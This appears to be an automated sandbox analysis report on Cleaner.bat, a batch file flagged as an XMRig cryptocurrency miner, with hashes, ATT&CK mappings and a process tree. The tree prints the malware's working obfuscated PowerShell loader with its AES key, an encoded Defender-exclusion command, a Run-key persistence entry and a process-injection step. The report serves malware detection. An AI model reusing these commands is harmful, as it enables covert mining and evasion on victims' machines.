xmrig | 0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233

General

Target

Cleaner.bat
Size

3.1MB
MD5

b0f63b3801d950a3ce8f27d08d4b413a
SHA1

5445683bc8c1bdc716ae84cd59dea91ae814dd19
SHA256

0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233
SHA512

051f9fcba315db5f9cc0dec07c1736f984ef94151b92e7ecc3c6823529f4e55270ff44bd08416a77a9f0eb8c732b679ff0500932d309ab51e645b4db909cfc43

Score

10^/10

xmrig evasion miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2584-154-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/2584-155-0x000000014036DB84-mapping.dmp	xmrig
behavioral2/memory/2584-157-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/2584-158-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral2/memory/2584-160-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

Processes:

cmd.exe

flow pid process

11 2584 cmd.exe
13 2584 cmd.exe
14 2584 cmd.exe
Executes dropped EXE 1 IoCs

Processes:

Cleaner.bat.exe

pid process

664 Cleaner.bat.exe
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

flow	pid	process
11	2584	cmd.exe
13	2584	cmd.exe
14	2584	cmd.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Cleaner.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	Cleaner.bat.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Cleaner.bat.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cleaner.bat = "cmd /c \"C:\\Users\\Admin\\Cleaner.bat\""	Cleaner.bat.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

Cleaner.bat.exe

description pid process target process

PID 664 set thread context of 2584 664 Cleaner.bat.exe cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5008 1524 WerFault.exe cmd.exe

description	pid	process	target process
PID 664 set thread context of 2584	664	Cleaner.bat.exe	cmd.exe

pid	pid_target	process	target process
5008	1524	WerFault.exe	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Cleaner.bat.exepowershell.execmd.exe

pid	process
664	Cleaner.bat.exe
664	Cleaner.bat.exe
2296	powershell.exe
2296	powershell.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe
2584	cmd.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

pid	process
668

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

Cleaner.bat.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exe

description	pid	process
Token: SeDebugPrivilege	664	Cleaner.bat.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeShutdownPrivilege	2632	powercfg.exe
Token: SeCreatePagefilePrivilege	2632	powercfg.exe
Token: SeShutdownPrivilege	3628	powercfg.exe
Token: SeCreatePagefilePrivilege	3628	powercfg.exe
Token: SeShutdownPrivilege	1920	powercfg.exe
Token: SeCreatePagefilePrivilege	1920	powercfg.exe
Token: SeShutdownPrivilege	2628	powercfg.exe
Token: SeCreatePagefilePrivilege	2628	powercfg.exe
Token: SeLockMemoryPrivilege	2584	cmd.exe
Token: SeLockMemoryPrivilege	2584	cmd.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

cmd.exeCleaner.bat.execsc.execmd.execmd.exe

description	pid	process	target process
PID 1524 wrote to memory of 1424	1524	cmd.exe	cmd.exe
PID 1524 wrote to memory of 1424	1524	cmd.exe	cmd.exe
PID 1524 wrote to memory of 2704	1524	cmd.exe	xcopy.exe
PID 1524 wrote to memory of 2704	1524	cmd.exe	xcopy.exe
PID 1524 wrote to memory of 3120	1524	cmd.exe	attrib.exe
PID 1524 wrote to memory of 3120	1524	cmd.exe	attrib.exe
PID 1524 wrote to memory of 664	1524	cmd.exe	Cleaner.bat.exe
PID 1524 wrote to memory of 664	1524	cmd.exe	Cleaner.bat.exe
PID 664 wrote to memory of 4468	664	Cleaner.bat.exe	csc.exe
PID 664 wrote to memory of 4468	664	Cleaner.bat.exe	csc.exe
PID 4468 wrote to memory of 1936	4468	csc.exe	cvtres.exe
PID 4468 wrote to memory of 1936	4468	csc.exe	cvtres.exe
PID 664 wrote to memory of 2052	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2052	664	Cleaner.bat.exe	cmd.exe
PID 2052 wrote to memory of 2296	2052	cmd.exe	powershell.exe
PID 2052 wrote to memory of 2296	2052	cmd.exe	powershell.exe
PID 664 wrote to memory of 3568	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 3568	664	Cleaner.bat.exe	cmd.exe
PID 3568 wrote to memory of 2632	3568	cmd.exe	powercfg.exe
PID 3568 wrote to memory of 2632	3568	cmd.exe	powercfg.exe
PID 3568 wrote to memory of 3628	3568	cmd.exe	powercfg.exe
PID 3568 wrote to memory of 3628	3568	cmd.exe	powercfg.exe
PID 3568 wrote to memory of 1920	3568	cmd.exe	powercfg.exe
PID 3568 wrote to memory of 1920	3568	cmd.exe	powercfg.exe
PID 3568 wrote to memory of 2628	3568	cmd.exe	powercfg.exe
PID 3568 wrote to memory of 2628	3568	cmd.exe	powercfg.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 664 wrote to memory of 2584	664	Cleaner.bat.exe	cmd.exe
PID 1524 wrote to memory of 220	1524	cmd.exe	attrib.exe
PID 1524 wrote to memory of 220	1524	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

3120 attrib.exe
220 attrib.exe

pid	process
3120	attrib.exe
220	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F"
2⤵
PID:1424

C:\Windows\system32\xcopy.exe
xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe" /y
2⤵
PID:2704

C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
2⤵
- Views/modifies file attributes
PID:3120

C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
Cleaner.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $cpGMmW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Cleaner.bat').Split([Environment]::NewLine);$vKMTac = $cpGMmW[$cpGMmW.Length - 1];$qUeblb = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgZHlIZHhWIHsgcHVibGljIHN0YXRpYyBieXRlW10gSHVTTFdiKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gRndaYVdtKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $qUeblb;[System.Reflection.Assembly]::Load([dyHdxV]::FwZaWm([dyHdxV]::HuSLWb([System.Convert]::FromBase64String($vKMTac), [System.Convert]::FromBase64String('GpALIgw8Bm2Ku/F1LxriAEFFGLwksa0vKKHsogEGbsM='), [System.Convert]::FromBase64String('0GcmDM5eLt1yF271xja3FQ==')))).EntryPoint.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES69BB.tmp" "c:\Users\Admin\AppData\Local\Temp\l0syrkse\CSC43EE0D93142C47878DF09B9DB3B4965.TMP"
4⤵
PID:1936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBtAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB0AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwB2AHYAIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:2052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGgAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBtAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB0AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwB2AHYAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:3568

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe drfqmlnvpiibl0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB03TtmEydM3r45suIY99yeGKcgftsrBdvESbWdMi9i5bh/zfUW1ZnMLjHBbKDBGataHhw5nUQaadFedAE2keeYjFKWbK63MMcASoK60oarJE9p2cZy7dv70xlvjcFV3UfsEKGaJ8YMhSmRpiGOQYVFoLlCGZcgJ5df+2UdkVZFNIvmccTm+eWRge0ifCU1/QsI7VfaHoqUeGh5IRdOCxK3q/TB4YImGLfUtg6zm2I4XFpLJoqtkvUS/fwcQghskc7n25tTyLCS8EbA1uAteSqct4iqp3Vcb4wsNMwd7oew1y7tUJ3DOBrUjZCmY4ChoJ6I0ubqs1vK+LRzp2AzP+tq28KECYUjo8e7Nxp05q9nKLqlt5vdV8UIWehUMqdRENxWy/4aVDSJG8N4p6jKo5P1dYhg5klABQMncQkEqc+txV4ZPjh8mmoNKlA8+eaxgpdMEJ1APQpWIgT1fuX4CEsLJ0vjmiB4ebFJ8YQG5N7e2BGrcnOgvdJn5R20eOulwngomzxy5IOt9GHOio0XSCt/AKNVe+ak6mWfgD6gxt5ttS5d5B3iArlsdF7+ru+nmqHJgDnrkPHz5lhGozZ0uaIKLmJuDvCufApec68ZXc2h9PCjf8IbMcb3lLsPrUZFSxjjxj1XrXdnlcD/McNf4BrYvrkHlYxQOtopXitywvVCUkH/6jC/SwpjBHGXm3vqMnwI3ao81zNdKiYDpTKc7tH8T3FpvUNtQxRaZNdlmkQkJPM3JR26WrrrcCVoJqWks29+Q2IJJrOUABT0kG3cYarl3QPHeOd2O+JLihY6pJz/iLUDnpNLe6sRSLN8NUeWu/OtQVIOvpY+PB6EhqWu4HvGzS94MW8utZiK9j4DgauMvGJn3qIlI6ruE+I2IgKS5peujSHc79QNX9P0nYd56QXR3r4bGswx6SuaMv1g18/m3T4Ib3pUApEj5V5yJ7RU9WtXT9w1BmJFFy/aDZiOIzO5h1NebJnw31/OhtEWbPaLVLOiqw5u+dUBAxNLTGV/mFpUYN6aEJjsvWjgb/sbOc3ZQDTnIBMzWyO1i4bHuJYfxGqs157IbFKVMFjCImutzY2sOQw7fOTM1ezXB8IuK2QFbPQbEwfN+lhFP+A02r2NPCS5CgVsmKSTyowkfKCxFrK8ov75bzU1cQFqWcJx9jom37vR+8yZqGDmw6PWENXuqCp7kp2jOD3Fj4bp5GqCjfQUWG11pjnhOPmXXVCD2RnCLSFGmNgwDbbmc42O6OebDBtOzXe+i6ondZ86+QLge7bRnt7mybBNXqI4pmdmr9giWAKBLeZVsqg558KVKae+il88GowgwD9Zie8843TniOg8DaN+XpXMAU9iNPIZQWO2iT8/0as27YNxjcneJbhifGuRwD+c756fTkWwwvC+lAYrDesYrwt7o4LpUGsTPhfYhi+gMwweoUmHiZ8tLe1xbjgSu3AqYPxrhHcxdUy0TjvQ==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584

C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
2⤵
- Views/modifies file attributes
PID:220

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1524 -s 320
2⤵
- Program crash
PID:5008

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 412 -p 1524 -ip 1524
1⤵
PID:2324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3872

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

2

T1158

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

2

T1158

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
62461867e727b7a65c3b85016c812fea

SHA1
59a83efb0aea842574a9d804de00cfe174391a0b

SHA256
3714a4bf476a340629937c1a92e5cde2cdf9b55d894e9edf356c80f03c58c053

SHA512
05b0939c3243730015127f1da97184420ee073de1bf75c91655e3e58218e9bc41fb14fcaecad9912e1b93b3773c506854bd03665648b95e950a491b8814cbb9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES69BB.tmp
Filesize
1KB

MD5
58f98b066858fd606aada45ee053ea52

SHA1
3bb837f076cf7b42c6a489dcf3a139622b221f4c

SHA256
ad17c98969652c4db10290a5d1d22ddb9f5b4dcc5833844969032d65116d74b6

SHA512
4f7a0eba7b34380e5f0421c95a4c8f39205dc8e95355d00b1cfe840b4c5b1384b1c25908d237f1ecc1c98a5505482d3fc8d3783b7b0d44d46daa38e4d2e8a1b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.dll
Filesize
3KB

MD5
9deffe7af029480723ee2ca9819dad60

SHA1
7ee817cd87f9488eb54965241a1cb5ca7cd13042

SHA256
64e7339661c5e01f73036dc4ac899f8397ccccaf19011ff8fc874fe08738de55

SHA512
e5b58d6986b26ab838c0beeaaab305443eaf2f129b2fc8e1d06ec09df6a4acf5136595b3a65bda15cec45369752888e4e5eb9192b6625c22900e2f2707c2397a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l0syrkse\CSC43EE0D93142C47878DF09B9DB3B4965.TMP
Filesize
652B

MD5
80242c3cce355974b1d12f73343c9183

SHA1
7fdbb996ec7ab37225e3ed42bb69db618787230e

SHA256
e2fae1ea1aa09f95a1bdde7fbc28703043949e8ad632a52ba6cc579b38036b7a

SHA512
1b75745a7959edc1f7a41639ea0ca64de12a5dba8002bc3de638fc38117e1afdde60f5d7b17cb3972c2fa8fa3bebf66acd4086d6081783880a6cf42c63ba4277

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.0.cs
Filesize
744B

MD5
7ba109a6ade3811040a994c47678a924

SHA1
852d06b7e9d96fcd7ed0de7dca03882044d6684a

SHA256
82b5ccd87e34e64a00145fe3a7baaeb2fec10213583a32cf7a0327516fe960e3

SHA512
f81a5f1899594ab262ee4f57b3f4af58ed991d7db9bc48ec1397f9caa966f53e660e4e35fc0bfadc55ca13850b3727a2fab68ef42d445cd96ee290cfc11f4971

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.cmdline
Filesize
369B

MD5
388f2ccc52d8711aa07f8686dc54668e

SHA1
b14d409cea30888401214f308f33969b9cb48be3

SHA256
99575aabc36ec3f7c7dd5a2c774299febebcfc7910aa3d45401d7a8d239c3b10

SHA512
675ee28e94a441243b7e41b70662c278c48f06e599863cfdfd7d5ea4117001cd655ba369f12607a626eac49175e4a9a99a261ac7120e110df85b10e161bebca4

Download Submit
memory/220-161-0x0000000000000000-mapping.dmp

Download
memory/664-134-0x0000000000000000-mapping.dmp

Download
memory/664-137-0x00007FF8E7ED0000-0x00007FF8E8991000-memory.dmp

Filesize
10.8MB

Download
memory/664-136-0x000001DE4B2E0000-0x000001DE4B302000-memory.dmp

Filesize
136KB

Download
memory/664-145-0x000001DE634B0000-0x000001DE634C2000-memory.dmp

Filesize
72KB

Download
memory/1424-130-0x0000000000000000-mapping.dmp

Download
memory/1920-152-0x0000000000000000-mapping.dmp

Download
memory/1936-141-0x0000000000000000-mapping.dmp

Download
memory/2052-146-0x0000000000000000-mapping.dmp

Download
memory/2296-148-0x00007FF8E7ED0000-0x00007FF8E8991000-memory.dmp

Filesize
10.8MB

Download
memory/2296-147-0x0000000000000000-mapping.dmp

Download
memory/2584-154-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/2584-164-0x000001C2777F0000-0x000001C277810000-memory.dmp

Filesize
128KB

Download
memory/2584-163-0x000001C2777F0000-0x000001C277810000-memory.dmp

Filesize
128KB

Download
memory/2584-162-0x000001C277380000-0x000001C2773C0000-memory.dmp

Filesize
256KB

Download
memory/2584-155-0x000000014036DB84-mapping.dmp

Download
memory/2584-165-0x000001C277C20000-0x000001C277C40000-memory.dmp

Filesize
128KB

Download
memory/2584-157-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/2584-158-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/2584-159-0x000001C1E4E80000-0x000001C1E4EA0000-memory.dmp

Filesize
128KB

Download
memory/2584-160-0x0000000140000000-0x0000000140803000-memory.dmp

Filesize
8.0MB

Download
memory/2628-153-0x0000000000000000-mapping.dmp

Download
memory/2632-150-0x0000000000000000-mapping.dmp

Download
memory/2704-131-0x0000000000000000-mapping.dmp

Download
memory/3120-132-0x0000000000000000-mapping.dmp

Download
memory/3568-149-0x0000000000000000-mapping.dmp

Download
memory/3628-151-0x0000000000000000-mapping.dmp

Download
memory/4468-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads